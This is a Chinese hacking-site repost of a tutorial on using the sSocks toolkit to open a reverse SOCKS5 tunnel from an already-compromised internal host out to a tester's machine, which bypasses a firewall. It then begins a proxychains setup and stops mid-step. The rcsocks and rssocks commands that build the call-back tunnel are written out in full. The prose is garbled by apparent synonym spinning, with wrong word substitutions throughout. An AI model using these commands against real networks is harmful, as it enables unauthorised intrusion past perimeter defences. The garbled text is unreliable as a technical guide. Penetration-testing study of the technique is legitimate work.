Socks技术代理反弹突破内网

Socks技术代理反弹突破内网

编程入门hacker2017-07-11 8:21:3710081A+A-

随之数据安全观念的提高,很多的信息管理系统web开发均布署有防火墙,系统管理员依据工作要求将內部必需的业务网关根据端口映射等方式投射到内网ip中,如初始web服务网关80、MSSQL数据库业务网关1433等。根据布署防火墙能够将信息管理系统內部地区与内网ip思维防护开开,运用有关的对策合理防止或缓解来源于外界的进攻。

针对渗透测试者而言,怎样绕开防火墙的阻拦其他网进行渗透测试变成急待处理的难题,文中介紹了在夺得投射到公网的内部网虚拟主机限权后,怎样运用socks经销商反跳得到内部网访问限制。

1. sSocks

sSocks是1个socks经销商工具套装,能用来打开socks服务咨询,适用socks5认证,适用IPV6和UDP,并出示反方向socks服务咨询,将要无线电脑做为socks经销商服务器端,反跳回当地,巨大便捷内部网的渗透测试,其最新下载为0.0.13,可在下列连接处下載。

http://sourceforge.net/projects/ssocks/

下載压解后,运行命令编译。

 

./configure && make

 

编译进行,进到src文件名,会发觉有nsocks、ssocksd、ssocks、rcsocks,其作用表明介紹给出:

系统 作用

nsocks 相近根据Socks5代理后的netcat,能用来检测socks server

ssocksd 用于打开Socks5代理业务

ssocks 当地开启Socks5业务,并反跳到另外IP地址

rcsocks 接受反跳回来的Socks5业务,并刹车另一头口

2.模似网络空间表明

文中模似的网络空间见图为1,渗透测试端IP为192.168.10.50,内部网地区IP段192.168.206.0/24,内部网地区能没问题浏览192.168.10.0/24,现假定已得到192.168.206.130限权。 

3.执行Socks经销商反跳

1)当地监视网关

在渗透测试端192.168.10.50实行

./rcsocks -l 1088 -p 1080 -vv

等候无线Socks5虚拟主机浏览当地1080网关,建立网关1080与当地网关1088的联接入口,如图2。 

 

2)打开Socks5代理业务,反跳

在192.168.206.130上实行

./rssocks -vv -s 192.168.10.50:1080

开启Socks5业务,反跳到192.168.10.50的网关1080上,

 

这时在渗透测试端192.168.10.50可见到入口联接完成,

4.运用proxychains开展Socks5代理

根据前边的流程,Socks5代理已建立进行了。因为在渗透测试流程中,必须应用不一样的道具系统,而在各系统中各自配备Socks5代理消息比较繁杂,而部位系统不一定适用配备Socks5代理。以便简单化这种使用,人们能够选用proxychains。

proxychains是1个经销商数据采集软件,能够适用基本上全部系统的经销商,如ssh,telnet,ftp等。运用proxychains,系统能在经销商的坏境下被载入运作,而自身不用具有经销商作用。应用前必须对proxychains开展简易配备,开启配置文件proxychains.conf(在BT5坐落于/etc/proxychains.conf),如下图所示5如图,在[ProxyList]处加上


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 1条评论
  • 瑰颈酒奴2022-05-28 03:21:13
  • nbsp;   2)打开Socks5代理业务,反跳 在192.168.206.130上实行./rssocks -vv -s 192.168.10.50:1080 开启Socks5

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理